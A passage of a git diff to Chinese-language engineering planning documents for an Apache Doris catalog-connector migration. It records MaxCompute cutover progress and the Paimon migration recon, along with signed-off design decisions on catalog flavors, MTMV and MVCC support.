kickoff**(recon + 设计 + 批次计划,复用 P4 full-adopter 写 SPI 样板)。 - **2026-06-06(实现 ⑧·P4-T05)** ✅ **P4 Batch C 启动 — P4-T05 翻闸接线完成**(dormant、gate-green、**待 commit**,用户定时机):GsonUtils 三 GSON 注册(catalog `:397` / **db `:452`** / table `:472`)atomic 迁 `registerCompatibleSubtype`→`PluginDriven*` + 删 3 unused `maxcompute.*` import;`PluginDrivenExternalTable.getEngine`/`getEngineTableTypeName` 加 `case "max_compute"`(返 `MAX_COMPUTE_EXTERNAL_TABLE.toEngineName()`=null / `.name()`,**核 legacy 行为等价**);`legacyLogTypeToCatalogType` 仅加注释(默认分支已出 `"max_compute"`,不加 case)。**关键校正**:ordered TODO 漏 **db `:452`**——4-agent 对抗复核揪出,漏迁则翻闸后 `MaxComputeExternalDatabase.buildTableInternal:44` cast `PluginDrivenExternalCatalog`→`MaxComputeExternalCatalog` 抛 `ClassCastException`(es/jdbc/trino 均 catalog+db+table 齐迁,legacy DB 类已删);用户签字折入 T05。**复核另 2 告警判非问题**:`getMetaCacheEngine`→"default" 假阳性(plugin 路径经连接器 `initSchema` 取 schema、走 "default" 桶同 es/jdbc/trino,`MaxComputeExternalMetaCache` 仅 legacy 表引用=Batch-D 死码);`getMysqlType`→"BASE TABLE" 同 ES 既定行为(`ES_EXTERNAL_TABLE` 亦不在 `toMysqlType` switch,迁后同样 null→"BASE TABLE" 已 ship);dormancy 告警=既载中间态 caveat(其"留 registerSubtype"修法错=撞 duplicate-label IAE)。UT `PluginDrivenExternalTableEngineTest` +2 max_compute 例(9/9)。守门全绿(fe-core compile BUILD SUCCESS + checkstyle 0 + import-gate 0 + UT 9-0-0,真实 EXIT 核验)。详见设计 §3.4 / [D-026 校正]。**下一 = T06a(写接线 W-a..d + 静态分区/overwrite 绑定 + R-004 隔离 UT,dormant)→ T06b(flip)**。⚠️ T05↔flip 中间态不可部署(compat 已注册但 factory 仍 legacy)。 - **2026-06-06(设计 ⑤·Batch C)** ✅ **P4 Batch C 翻闸设计完成 + 用户签字 [D-026]**(design-only,零代码):用户选 "Design Batch C first"。4 路 Explore re-verify recon 锚点 + 主线核读 executor/txn 生命周期,出 [翻闸设计](./tasks/designs/P4-T05-T06-cutover-design.md)(verified file:line + 5 gap G1–G5 + 写生命周期顺序 + R-004 两分测 + ordered TODO)。**3 决策签字**:D-1 capability signal=新增 `ConnectorWriteOps.usesConnectorTransaction()` flag(MC=true,否决 writePlanProvider 代理/复用 ConnectorWriteType);D-2 两 commit、flip 末(`[P4-T06a]` 接线 dormant + `[P4-T06b]` flip);D-3 静态分区/overwrite 绑定入 cutover(避 INSERT OVERWRITE PARTITION 翻闸回归)。**2 SPI 新增**(default-preserving,零 jdbc/es/trino 影响):`ConnectorSession.setCurrentTransaction` + `ConnectorWriteOps.usesConnectorTransaction`(impl 时 E11 登记)。**recon 校正**:GsonUtils 真锚 :397/:472(非 ~405/~478);`legacyLogTypeToCatalogType` 默认分支已出 "max_compute"(无需加 case);live executor=`PluginDrivenInsertExecutor`(现走 JDBC insert-handle 模型,对 MC `getWriteConfig`/`beginInsert`/`finishInsert` 全 throwing-default=直跑必抛);`PluginDrivenTransactionManager.begin(connectorTx):71-77` 未 putTxnById(G3);`UnboundConnectorTableSink` 不携静态分区(G4)。**下一 = 实现 T05(dormant)→ T06(live, 两 commit)**。 @@ -210,7 +213,7 @@ | 类型 | 总数 | 最新条目 | 文档 | |---|---|---|---| -| **决策**(D-NNN) | 36 | D-036(P4-T06e FIX-CAST-PUSHDOWN:MC 关 CAST 谓词下推 + 剥壳抑制 source LIMIT,修 F9 静默丢行回归);D-035(FIX-BATCH-MODE-SPLIT 通用 batch SPI 路径);D-034(FIX-POSTCOMMIT-REFRESH swallow)| [decisions-log.md](./decisions-log.md) | +| **决策**(D-NNN) | 38 | D-038(P5-D2 paimon MTMV/MVCC 桥 P5 内实现,翻闸 gated);D-037(P5-D1 paimon flavor=单 Catalog + switch);D-036(P4-T06e FIX-CAST-PUSHDOWN)| [decisions-log.md](./decisions-log.md) | | **偏差**(DV-NNN) | 22 | DV-022(P4-T09 fe-common 去 odps 暴露隐藏传递依赖→显式补 netty/protobuf);DV-021(Batch-D 删后 4 条 Tier-3 接受项 GAP3/4/9/10)| [deviations-log.md](./deviations-log.md) | | **风险**(R-NNN) | 14 | R-014(thrift sink 选择灵活性) | [risks.md](./risks.md) | @@ -220,9 +223,9 @@ > 当本项目通过 Claude Code 这类 LLM agent 推进时,跟踪当前 session 状态、handoff 状况和 context 健康度。 -- **本 session 已完成**:**交接文档同步(P4 完成里程碑)** —— 核实 P4 全部合入(#64253 T01–T06 + #64300 T07–T09,含 #64119 校验迁移;fe-core 代码 + 依赖树彻底无 odps;分支 `branch-catalog-spi` 干净)后,更新 PROGRESS(§header / §一 P4→100% + P5 标「下一阶段」/ §二看板 maxcompute 100% / §三 P4 收尾 + **新增 P5 kickoff 块** / §四里程碑 / §六 D-036·DV-022 计数纠正 / §七)+ rewrite HANDOFF(第 19 次)。**无产线代码改动。** -- **下一个 session 应做**:**P5 paimon 迁移 kickoff** —— code-grounded recon(连接器模块现状 / fe-core footprint / 6 catalog flavor / MVCC·vended·sys-tables 即 E5/E6/E7 / 10 处反向 instanceof / 复用 P4 写 SPI)→ 写 `tasks/P5-paimon-migration.md`(设计 + 批次计划)→ 用户签字 → 分批实现。起点材料见 [HANDOFF 第 19 次](./HANDOFF.md) + [paimon 档](./connectors/paimon.md) + master [§3.6](./00-connector-migration-master-plan.md)。 -- **是否需要 handoff**:**是**——本场已 rewrite [HANDOFF.md](./HANDOFF.md)(第 19 次:P4 完成确认 + P5 kickoff 起点 + paimon 范围/风险/材料清单)。 +- **本 session 已完成**:**P5 paimon recon + 设计(0 产线代码)** —— 14-agent code-grounded recon + cross-cut 对抗复审,产 `research/p5-paimon-migration-recon.md`(5 功能区旧实现 + E1–E10 SPI 状态 + 跨切面 + MC 一致性 11 约定)+ `tasks/P5-paimon-migration.md`(old→new 映射 + 30 TODO/B0–B9 + 验收);用户签字 **D-037**(flavor=单 Catalog)/ **D-038**(MTMV/MVCC P5 内实现)。同步 connectors/paimon.md(修 3 stale 表述)+ decisions-log(+D-037/D-038)+ 本 PROGRESS + HANDOFF(覆盖)。 +- **下一个 session 应做**:**P5 分批实现** —— 从 **B0**(连接器测试模块 + no-mockito seam + parity baseline + pin paimon-core 版本)起,并行 **B6**(procedure doc no-op);继 **B1**(单 Catalog flavor 装配 + 每-flavor authenticator)→ B2/B3 → B4(E7 sys-table + E5 MVCC)→ B5(MTMV 桥)→ B7 翻闸(gated)→ B8 删 legacy → B9 回归。详见 [tasks/P5](./tasks/P5-paimon-migration.md) 批次依赖图。 +- **是否需要 handoff**:**是**——本场已**覆盖** rewrite [HANDOFF.md](./HANDOFF.md)(P5 recon+设计完成 + D-037/D-038 + 下一步 B0–B9)。 - **协作规范**:[AGENT-PLAYBOOK.md](./AGENT-PLAYBOOK.md)(context 预算、subagent 使用、handoff 触发条件) --- diff --git a/plan-doc/connectors/paimon.md b/plan-doc/connectors/paimon.md index c5e090b5eb8e48..67b3d160467972 100644 --- a/plan-doc/connectors/paimon.md +++ b/plan-doc/connectors/paimon.md @@ -10,10 +10,10 @@ | **fe-connector 模块** | `fe/fe-connector/fe-connector-paimon/` | | **fe-core 旧路径** | `fe/fe-core/src/main/java/org/apache/doris/datasource/paimon/` | | **共享依赖** | `fe-connector-hms`(paimon-HMS-flavor 用) | -| **计划迁移阶段** | **P5** | -| **当前状态** | ⏸ 未启动 | -| **完成度** | 20%(scan 路径 50%,catalog 路径 10%)| -| **主 owner** | TBD | +| **计划迁移阶段** | **P5**(recon+设计完成 2026-06-09,待分批实现)| +| **当前状态** | 🟡 设计完成;D-037/D-038 已签字;待 B0→B9 实现 | +| **完成度** | 25%(连接器 scan/predicate/handle 骨架;DDL/sys-table/MVCC/MTMV 全待迁)| +| **主 owner** | @morningman / TBD | --- @@ -24,7 +24,7 @@ | 1 | 🟡 | fe-core 22 个顶层 + `source/`(5 个)+ `profile/`(2 个)| | 2 | 🟡 | fe-connector 10 个文件,scan/predicate/handle 完整 | | 3 | ⏳ | 反向 instanceof:10 处 | -| 4 | 🟡 | ConnectorMetadata 部分实现;6 个 catalog flavor(HMS/DLF/REST/File/Base/Factory)未迁 | +| 4 | 🟡 | ConnectorMetadata 仅 read 实现;flavor 装配=单 Catalog + `createCatalog` flavor switch(D-037,**非** backend 模块——5 个 `fe-connector-paimon-backend-*` 是空壳)| | 5 | ⏳ | | | 6 | ✅ | META-INF/services 已注册 | | 7 | ⏳ | | @@ -41,7 +41,7 @@ | 扩展点 | 是否需要 | 实现状态 | 备注 | |---|---|---|---| | E1 CreateTableRequest | ✅ 需要 | 含 bucket spec | | -| E2 Procedures | 🟡 | paimon 有 expire-snapshots 等 | 后续 | +| E2 Procedures | ❌ 不需要 | **零可迁**:fe-core 无 paimon procedure(expire_snapshots=iceberg、CALL migrate_table=Spark,皆非 paimon)| doc-only no-op | | E3 MetaInvalidator | 🟡 | paimon-HMS-flavor 需要 | 复用 `fe-connector-hms` | | E4 Transactions | ✅ 需要 | | | E5 MvccSnapshot | ✅ 需要 | `PaimonMvccSnapshot` 待迁 SPI | | @@ -49,29 +49,38 @@ | E7 SysTables | ✅ 需要 | `PaimonSysExternalTable` 待迁 | | | E8 ColumnStatistics | 🟡 | snapshot summary 已含部分 | 可选 | | E9 Delete/Merge sink | 🟡 | merge-on-read 路径 | | -| E10 listPartitions | ✅ 需要 | | +| E10 listPartitions | ✅ 需要 | **连接器侧未实现**(FE 分发已预接 PLUGIN_EXTERNAL_TABLE,残留缺口是连接器 `listPartitions*`)| | +| **MTMV(无 E 号)** | ✅ 需要 | **SPI 完全无面(须新增 + fe-core `PaimonPluginDrivenExternalTable` 桥)**;paimon 是唯一带 MTMV 的 adopter | D-038(P5 内实现)| --- ## 已知特殊性 -- **6 个 catalog flavor** —— 用工厂模式重组:`PaimonConnectorProvider.create()` 根据 properties 实例化 paimon Catalog。 -- **重复类 `PaimonPredicateConverter`** 在 fe-core 和 fe-connector 两边都有,P1 清理 fe-core 版本。 -- BE 通过 JNI 调用 paimon-reader;连接器通过 `ConnectorScanPlanProvider.getSerializedTable(props)` 序列化 paimon `Table` 对象给 BE。 -- 0 个测试。 +- **flavor 装配(D-037=单 Catalog)**:6 flavor(hms/filesystem/dlf/rest/jdbc + base)经 `PaimonConnector.createCatalog` 内 flavor switch on `paimon.catalog.type`(MC 一致,拷常量/conf/**每-flavor authenticator** 入模块)。⚠️ 5 个 `fe-connector-paimon-backend-*` 模块只是**空壳**(gitignore `.flattened-pom.xml`,零 src),**不采用**其 backend-SPI 设计。 +- **MTMV(D-038)**:SPI 无 MTMV 面(E10/MTMV 缺),`PluginDrivenExternalTable` 不实现任何 MTMV 接口 → 翻闸前须落 fe-core `PaimonPluginDrivenExternalTable` 桥(否则静默回归);paimon 是**首个真消费 E5(MVCC)/E6(vended)/E7(sys-table)** 的 adopter,MC 无先例。 +- **重复类 `PaimonPredicateConverter`**(fe-core `source/:43` vs 连接器 `:57`)翻闸时删 fe-core 版;连接器版有 session-TZ bug(固定 UTC `:284`)须修。 +- BE 经 JNI(**及 C++ native** `paimon_cpp_reader`)调 paimon-reader;连接器经 `ConnectorScanPlanProvider.getSerializedTable` 序列化 `Table`。BE 冻结不动;序列化身份是契约(Base64 非 blocker,BE 有 STD fallback;须 pin paimon-core 版本三方对齐)。 +- **0 个测试** —— 须建测试模块(no-mockito seam)+ parity baseline。 +- 详尽 code-grounded 分析见 [recon](../research/p5-paimon-migration-recon.md) + [P5 设计 doc](../tasks/P5-paimon-migration.md)。 --- ## 关联 -- 阶段 task:P5(待启动时建) -- 决策:D-006(cache 放连接器内)、D-005(HMS flavor 走 tableFormatType) +- 阶段 task:[tasks/P5-paimon-migration.md](../tasks/P5-paimon-migration.md)(30 TODO / B0–B9 批) +- recon:[research/p5-paimon-migration-recon.md](../research/p5-paimon-migration-recon.md) +- 决策:D-037(flavor=单 Catalog + switch)、D-038(MTMV/MVCC P5 内实现,翻闸 gated)、D-006(cache 放连接器内)、D-005(HMS flavor 走 tableFormatType) - 偏差:(暂无) -- 风险:R-004(classloader)、R-012(snapshotId 类型) +- 风险:R-004(classloader)、R-007(FE/BE 共享 jar)、R-012(snapshotId 类型) --- ## 进度日志 +### 2026-06-09 +- P5 kickoff:14-agent code-grounded recon + cross-cut 对抗复审;产 recon + 设计 doc(30 TODO/B0–B9)。 +- 用户签字 D-037(flavor=单 Catalog + switch)、D-038(MTMV/MVCC P5 内实现,翻闸 gated on 它)。 +- 证伪 3 先验:backend 模块空壳(非已建工厂)、FE 分发部分已预接(残留=连接器 listPartitions)、Base64 非 blocker(BE 有 STD fallback)。 + ### 2026-05-24 - 跟踪文件建立。scan 路径已就绪,但 6 个 catalog flavor + MVCC + sys-tables + vended creds 都还在 fe-core。 diff --git a/plan-doc/decisions-log.md b/plan-doc/decisions-log.md index 1965d7f1a8e6d0..7d1575b5c5124e 100644 --- a/plan-doc/decisions-log.md +++ b/plan-doc/decisions-log.md @@ -15,6 +15,8 @@ | 编号 | 别名 | 简述 | 日期 | 状态 | |---|---|---|---|---| +| D-038 | P5-D2 | **P5 paimon MTMV + MVCC(时间旅行) scope = P5 内实现桥,翻闸 gated on 它(用户签字,design-only)**:SPI 当前 **MTMV 完全无面(E10 缺)**(`PluginDrivenExternalTable:62` 不 implements MTMVRelatedTableIf/MTMVBaseTableIf/MvccTable,框架靠 `instanceof MTMVRelatedTableIf` 分发——`MTMVPartitionUtil:265/497/588`、`StatementContext:987/1003`),E5(MVCC) `defined-no-consumer`(`ConnectorMvccSnapshotAdapter` 仅自身文件引用、`ConnectorScanRange` 无 snapshot 字段)。legacy `PaimonExternalTable:74` 实现全套。翻闸不机械阻断(plain SELECT 经 `getPaimonTable(empty)` 取 latest)但按 MC 样板直接翻闸=**静默回归** paimon-as-MTMV-base + 时间旅行。**用户定 = 方案 A**:P5 内落 fe-core `PaimonPluginDrivenExternalTable extends PluginDrivenExternalTable` 实现三接口 + 首个真 E5 消费者 override `beginQuerySnapshot` 三方法 + 新增 GAP-LISTPART-AT-SNAPSHOT 的 at-snapshot listPartitions;表级 staleness=`ConnectorMvccSnapshot.getSnapshotId()`(-1 空表)、分区级=`ConnectorPartitionInfo.getLastModifiedMillis()`(已存在);MTMV 类型/PartitionItem 留 fe-core、连接器仅供 SPI-neutral 数据。**翻闸(B7) gated on MTMV 桥(B5)**;**禁**静默读 latest。否决 B(翻闸先行 + MTMV fail-loud 延后)。最高 correctness 风险=单-pin 不变式 + `lastFileCreationTime()` 跨 flavor 可靠性(SDK 行为,须 live 验)。设计 `tasks/P5-paimon-migration.md` §开放决策 D2 + recon §3.5/§4 | 2026-06-09 | ✅ | +| D-037 | P5-D1 | **P5 paimon flavor(hms/filesystem/dlf/rest/jdbc) 装配 = 单 Catalog + `createCatalog` flavor switch(MC 一致,用户签字,design-only)**:连接器现走单 Catalog stub(`PaimonConnector.createCatalog:75-83` 把 `Options.fromMap` 直喂 paimon SDK CatalogFactory,无 Doris 侧 warehouse/HiveConf/StorageProperties/authenticator 装配);5 个 `fe-connector-paimon-backend-*` 模块**是空壳**(仅 gitignore `.flattened-pom.xml`、零 src/未注册 Maven 模块)。legacy 装配在 fe-core `AbstractPaimonProperties`+5 子类+`PaimonPropertiesFactory`,全 import 禁用的 fe-core `StorageProperties`/`HMSBaseProperties`/`HadoopExecutionAuthenticator`。**用户定 = 方案 A**:`PaimonConnector.createCatalog` 内 switch on `paimon.catalog.type`,**拷** warehouse/conf/S3-normalize + 重建 Hadoop/HiveConf + **每-flavor ExecutionAuthenticator** 入模块(镜像 MC 拷 MCProperties→MCConnectorProperties;filesystem→hms→rest/jdbc/dlf 渐进)。**不**建 backend 模块 + ServiceLoader(否决 B:无 MC 先例、大 surface、空壳从零建)。约束:StorageProperties 从属性 map 重建(禁 import);**每-flavor authenticator 必须保**(否则 Kerberized HMS/HDFS DDL 运行时炸、无离线测覆盖)。设计 `tasks/P5-paimon-migration.md` §开放决策 D1 + recon §3.4 | 2026-06-09 | ✅ | | D-036 | — | **P4-T06e FIX-CAST-PUSHDOWN MaxCompute 关 CAST 谓词下推 + 剥壳时抑制 source LIMIT(F9 静默丢行回归,review 原误判 known-degr 已推翻)**:共享 converter 无条件剥 CAST(`ExprToConnectorExpressionConverter:108`)、MaxCompute 不 override `supportsCastPredicatePushdown`(继承默认 true)→ `buildRemainingFilter` 不剔除含 CAST 的 conjunct → 剥壳谓词推入 ODPS read session(`CAST(str AS INT)=5`→源过滤 `str="5"` 按列 STRING quote)→ 源端 under-match 丢 `'05'/' 5'`、BE 复算只能过滤超集向下无法找回 → **静默丢行**。legacy `convertSlotRefToColumnName` 对 CAST 操作数抛异常→caught→丢弃该谓词(BE-only)→正确 ⇒ cutover 比 legacy 严格更紧 = **回归**(区别于 [DV-016] 仅 limit-opt 资格 CAST-unwrap、非丢行)。**对抗核验 `wzoa6dkvw` 0/3 refuted、verdict=real-unregistered-regression**。**用户定 Fix**。修 = ① 连接器 `MaxComputeConnectorMetadata.supportsCastPredicatePushdown→false`(激活既有 strip 路径、CAST conjunct 保留 BE-only、恢复 legacy parity;镜像 JDBC + `ConnectorPushdownOps` doc 处方;无 SPI 变更、无新路径);② fe-core `getSplits` 在 CAST conjunct 被剥(`filteredToOriginalIndex!=null`)时抑制 source LIMIT 下推(抽纯静态 `effectiveSourceLimit`)——否则连接器收空 filter→limit-opt(ON 时) row-offset 读首 N 行无谓词→BE under-return(impl-review `wj2h0120n` F9-LIMITOPT-1 折入;`startSplit` 批路径已恒 -1[DEC-1] 故只改 getSplits)。守门:连接器 UT 2/2+mutation(false→true 红)、fe-core LimitStrip 2/2+BatchMode 9/9+mutation 2/2 向红、checkstyle 0、import-gate 净。真值闸=live ODPS CAST(str)=5 返回全集(DV-020,CI 跳)。out-of-scope surface:JDBC `applyLimit`+cast-off 理论同类(MC 不 override applyLimit、本修对 MC 完整)。commit `cc32521ed99` | 2026-06-08 | ✅ | | D-035 | — | **P4-T06e FIX-BATCH-MODE-SPLIT 通用 batch SPI 路径恢复异步分批 split(Shape A,NG-7/F6=F13 minor)**:翻闸后 `PluginDrivenScanNode` 不 override `isBatchMode/numApproximateSplits/startSplit` → 继承 `SplitGenerator` 默认(false/-1/no-op)→ plugin-driven(含 MC) 读永走同步 `getSplits` 一次性枚举全(已裁剪)分区 split;legacy `MaxComputeScanNode:214-298` 分批异步建 read session 流式喂 split。P1-4 后降级收窄到「裁剪后仍 ≥`num_partitions_in_batch_mode` 分区」(规划慢 + 大 session 潜在 OOM、行正确)。**用户定「实现 batch SPI 路径」(非 DV)**。修 = **Shape A(薄 SPI + fe-core 编排、逐字镜像 legacy)**:① SPI `ConnectorScanPlanProvider` +2 additive default(`supportsBatchScan` 默认 false / `planScanForPartitionBatch` 默认委托 6 参 `planScan` over 子集)零破坏其余 6 连接器;② 连接器 `MaxComputeScanPlanProvider.supportsBatchScan`=`odpsTable.getFileNum()>0`(`planScanForPartitionBatch` 不 override,继承默认即批语义);③ fe-core `PluginDrivenScanNode`(extends `FileQueryScanNode` 已继承 batch dispatch+stop;`PluginDrivenSplit extends FileSplit` 故 `:381` 转型安全)override `isBatchMode`(4 闸 isPruned+slots+supportsBatchScan+size≥阈值,含 SF-1 `getScanPlanProvider()` null-guard)/`numApproximateSplits`=size/`startSplit`(`getScheduleExecutor` outer/inner CompletableFuture 分批,`needMoreSplit/addToQueue/finishSchedule/setException/isStop` 契约,DEC-1 不下推 limit 传 -1 与 P3-9 limit-opt 互斥)+ 抽纯静态 `shouldUseBatchMode` 供单测。clean-room 设计验证 `wcpg9lblj` GO-WITH-EDITS(0 mustFix + 2 shouldFix:SF-1 null-guard NPE 修 + 预核文案,已折入)+ impl-review `wve7y1jst` GO-WITH-EDITS(0 mustFix + 1 shouldFix TQ-1 测试覆盖文案诚实降级 + 2 nit,已折入)。守门:编译 BUILD SUCCESS、fe-core UT 9/9、fe-connector-api UT 2/2、checkstyle 0、import-gate 净、mutation 5/5 向红。真值闸=大分区 live e2e(DV-019,CI 跳)。**Batch-D 红线**:legacy `MaxComputeScanNode` batch 逻辑须待本 fix 落才可删(读裁剪那半 P1-4 已清,本项为最后前置闸)。commit `ac8f0fc15eb` | 2026-06-08 | ✅ | | D-034 | — | **P4-T06e FIX-POSTCOMMIT-REFRESH 接受更安全的 post-commit 刷新 swallow、不回退 legacy 传播失败(无产线逻辑改动,NG-8/F15=F21 minor)**:翻闸后 `PluginDrivenInsertExecutor.doAfterCommit()` 用 try/catch 吞 `super.doAfterCommit()`(=`handleRefreshTable`)刷新失败、INSERT 仍报 OK;legacy `MCInsertExecutor` 不 override → 异常传播 → 报 FAILED。按生命周期序 `doBeforeCommit→commit(远端持久)→doAfterCommit`,`handleRefreshTable` 跑时数据已落 ODPS/远端、FE 无法回滚,且只刷 FE 缓存 + 写 external-table refresh editlog(follower 缓存失效提示、非数据真相源)、不碰已提交数据 → 报 FAILED 会诱发重试→**重复写**。**用户定(2026-06-08):接受 swallow(更安全)+ Javadoc 泛化 + DV 登记,不回退**。改 = **无产线逻辑**:仅 Javadoc(`:164-176`) 从「只讲 JDBC_WRITE」泛化到覆盖 MC connector-transaction 路径(两路径数据均已持久;swallow 最坏只瞬时缓存 stale 自愈;显式注明有意分歧 legacy、引用 [DV-018])。对抗性安全核查:master 先本地刷新(`RefreshManager:152`)后写 editlog(`:155`),丢 editlog 仅 follower 缓存暂 stale 自愈、无正确性损失/无主从分裂。守门:checkstyle 0、import-gate 净(注释 only、字节码不变)。真值闸=CI-skip live e2e(MC INSERT 后人为令 refresh 失败→断言报 OK)。commit `1f2e00d3696` | 2026-06-08 | ✅ | diff --git a/plan-doc/research/p5-paimon-migration-recon.md b/plan-doc/research/p5-paimon-migration-recon.md new file mode 100644 index 00000000000000..65b6994391cb12 --- /dev/null +++ b/plan-doc/research/p5-paimon-migration-recon.md @@ -0,0 +1,143 @@ +# P5 paimon 迁移 — code-grounded recon + +> 产出于 P5 启动(2026-06-09)。方法:14 路 subagent(5 区 fe-core 旧实现 + 新 SPI 面 + maxcompute 样板 + 连接器现状 → 5 区 old→new 设计 → 跨切面对抗复审)code-grounded 调研 + 主线 firsthand 核读 load-bearing 锚点(SPI_READY_TYPES / GSON 注册 / PluginDrivenExternalTable / ConnectorPartitionInfo)。 +> 用途:research-design-workflow 的 research note;P5 scope fork 的事实底座。设计/批次/TODO 见 `tasks/P5-paimon-migration.md`。 +> 范围:用户指定 5 功能区 —— ① 普通表读取 ② 系统表读取 ③ procedure ④ DDL ⑤ mtmv —— 旧框架实现 + 映射新 SPI + 对齐 maxcompute 接口一致性。 + +--- + +## 0. 头条结论(与 HANDOFF / 连接器档假设的偏差) + +**paimon 是首个真正消费 E5(MVCC)/E6(vended)/E7(sys-tables) 的 adopter,且唯一带 MTMV 的 adopter —— 而 SPI 对 MTMV 完全无面(E10 缺)。maxcompute 这四块全无先例。** + +1. **「6 catalog flavor 工厂重组」失真**:`fe-connector-paimon-{api,backend-filesystem,backend-hms,backend-rest,backend-aliyun-dlf}` 五个模块**只有 gitignore 的 `.flattened-pom.xml`,零 src / 零 pom / 未注册 Maven 模块 / 连接器不依赖它们**(`git ls-files` 实证)。当前连接器走**单 Catalog 模型**:`PaimonConnector.createCatalog`(`PaimonConnector.java:75-83`)把 `Options.fromMap(props)` 直接喂 paimon SDK 的 `CatalogFactory`,由 SDK 按 `paimon.catalog.type` 自分发——**无任何 Doris 侧 flavor 装配**(warehouse / HiveConf / StorageProperties / 每-flavor authenticator 全缺)。→ flavor 模型是 **scope fork**(见 §11 决策 D1)。 +2. **MTMV 无 SPI 面(E10 缺,blocker)**:`PluginDrivenExternalTable`(`PluginDrivenExternalTable.java:62`)**不** implements `MTMVRelatedTableIf`/`MTMVBaseTableIf`/`MvccTable`(firsthand 核实);MTMV 框架靠 `instanceof MTMVRelatedTableIf` 分发(`MTMVPartitionUtil.java:265/497/588`、`StatementContext.java:987/1003` 的 `MvccTable`)。故**翻闸后 SPI paimon 表对 MTMV 刷新与时间旅行 pin 完全隐形**——若按 maxcompute 样板直接翻闸即**静默功能回归**。legacy `PaimonExternalTable.java:74` 实现全部三接口。 +3. **procedure = 零可迁**:fe-core `datasource/paimon/` **无 procedure/action 文件**;`CALL paimon.x` 现即抛 `AnalysisException`(`CallFunc.java:43`),`ALTER TABLE paimon EXECUTE` 现即抛 `DdlException`(`ExecuteActionFactory.java:61`)。唯 iceberg 有 EXECUTE actions(11 文件,FE 内嵌 SDK 跑),`expire_snapshots` 是 **iceberg** 词,非 paimon。→ P5 该区 = **doc-only no-op**(非「后续 port」)。 +4. **读路径已近完工**:连接器 `PaimonScanPlanProvider` 已做 `ReadBuilder.withFilter/withProjection/newScan().plan().splits()` + native(ORC/Parquet)-vs-JNI 分类 + deletion file + `TPaimonFileDesc`,与 fe-core 字节级接近 → 普通表读取主要是**补缺 + 翻闸**,非 greenfield。 +5. **翻闸 GSON blast radius 比 MC 大**:paimon 有 **7 处注册**(5 catalog `GsonUtils.java:390-396` + db `:450` + table `:471`,全 `registerSubtype`,firsthand 核实),MC 只迁 1 catalog 名。漏任一(尤其 db)→ replay `ClassCastException`([[catalog-spi-gson-migrate-all-three]])。 +6. **重复 `PaimonPredicateConverter`** 确认:fe-core `source/PaimonPredicateConverter.java:43`(吃 fe-core `Expr`)vs 连接器 `PaimonPredicateConverter.java:57`(吃 `ConnectorExpression`)。连接器版有 **session-TZ bug**(时间戳走固定 UTC offset `:284`,无 session TZ)——[[catalog-spi-connector-session-tz-gotcha]] 同款,翻闸前须修。 + +--- + +## 1. 连接器现状(`fe-connector-paimon` = 10 文件 / metadata-read + scan 骨架) + +唯一 git-tracked 模块(`fe/fe-connector/pom.xml:49` 注册),Phase-1 commit `5c325655b8b`(PR 62183) 建,**非** P5 专项。**0 测试**。 + +| 类 | 状态 | 锚点 / 备注 | +|---|---|---| +| `PaimonConnectorProvider` getType=`paimon` | ✅ | `:32`;META-INF/services 已注册;运行时永不分发(paimon 不在 SPI_READY_TYPES)| +| `PaimonConnector` | ✅ | `:43`;lazy double-checked 建 Catalog(`:64-83`,**stub**,无 flavor 装配)| +| `PaimonConnectorMetadata` | 🟡 read-only | `:51`;list db/table + getTableHandle/getTableSchema/getColumnHandles 实现;`getProperties` stub 返空(`:154`);DDL/write/stats/**partition**/MVCC/sys-table/identifier 全落 SPI throwing/empty 默认 | +| `PaimonScanPlanProvider` | 🟡 | `:71`;planScan 真做 projection+predicate+native/JNI+deletion;缺 COUNT 下推(row_count 恒 -1)、cpp-reader encode、history-schema、6-arg requiredPartitions override;planScan 假设 `getPaimonTable` 非空**无 reload fallback** | +| `PaimonPredicateConverter` | 🟡 | `:57`;AND/OR/比较/IN/IS NULL/前缀 LIKE;FLOAT 返 null(`:262`)、CHAR null(`:274`)(与 legacy 故意不下推一致)、TIME 不支持、**时间戳固定 UTC(`:284`) 无 session TZ = bug** | +| `PaimonScanRange` | ✅ | `:51`;populateRangeParams(`:155-227`) 建 `TPaimonFileDesc`(JNI+native+deletion+count+columns-from-path);getTableFormatType=`paimon`(`:130`);row_count 分支在但 provider 不喂 | +| `PaimonTableHandle` | ✅ 但有坑 | `:31`;持 db/table/partition-keys/primary-keys + **transient Table(`:41/73`)**;序列化后 Table 丢、planScan 无 reload = **BLOCKER** | +| `PaimonColumnHandle` / `PaimonTypeMapping` / `PaimonConnectorProperties` | ✅ | TypeMapping 仅 paimon→ConnectorType(DDL 反向缺);Properties 仅 catalog-type/warehouse/2 mapping flag(HMS/REST/DLF/JDBC/cred 键全缺)| + +**5 个 backend 模块 = 空壳**(仅 gitignore `.flattened-pom.xml`,描述意图中的 `PaimonBackend`/`PaimonBackendFactory` ServiceLoader;aliyun-dlf 自述「M3 STUB」)。 + +--- + +## 2. 新 SPI 面 E1–E10 状态(paimon 视角) + +| 扩展点 | 状态 | 锚点 / paimon 关系 | +|---|---|---| +| E1 CreateTableRequest | ✅ defined-and-consumed | `ddl/ConnectorCreateTableRequest.java:40` + PartitionSpec/BucketSpec;MC 已用;`CreateTableInfoToConnectorRequestConverter` 喂;paimon createTable 待实现 | +| E2 Procedures | ❌ **absent** | 无任何 procedure SPI;最近似 `ConnectorTableOps.executeStmt:114`(DML passthrough,**非** procedure registry)。paimon 无需(§3.3)| +| E3 Scan/Pushdown | ✅ defined-and-consumed | `scan/ConnectorScanPlanProvider.java:38`(planScan/getSerializedTable:278) + `ConnectorPushdownOps.java:35`;`PluginDrivenScanNode:474/660/679` 消费;paimon 已用 | +| E4 Write/Transaction | ✅ defined-and-consumed | `write/ConnectorWritePlanProvider.java:34` + `ConnectorWriteOps` + `ConnectorTransaction`;live consumer = MC。**paimon 写本 session 未列入用户 5 区**(legacy `PaimonMetadataOps` 仅 DDL,无 INSERT 写 session;merge-on-read 写是 E9,未来)| +| E5 MvccSnapshot | 🟡 **defined-no-consumer** | `mvcc/ConnectorMvccSnapshot.java:34`(final,仅 snapshotId:51/timestampMillis:56/desc/props);`ConnectorMetadata.beginQuerySnapshot:60/getSnapshotAt:66/getSnapshotById:73` 默认空;`ConnectorMvccSnapshotAdapter` **仅自身文件引用**,3 方法仅测试调;`ConnectorScanRange` **无 snapshot 字段**(无 BE pin seam)。**paimon = 首个真消费者** | +| E6 VendedCredentials | ❌ **absent** | 仅 `ConnectorCapability.SUPPORTS_VENDED_CREDENTIALS` 枚举常量(`:38`),零消费者。paimon REST flavor 首个需求方 | +| E7 SysTables | ❌ **absent** | 无 SysTable/MetadataTable SPI、无 fe-core bridge。仅 `listPartitions*` 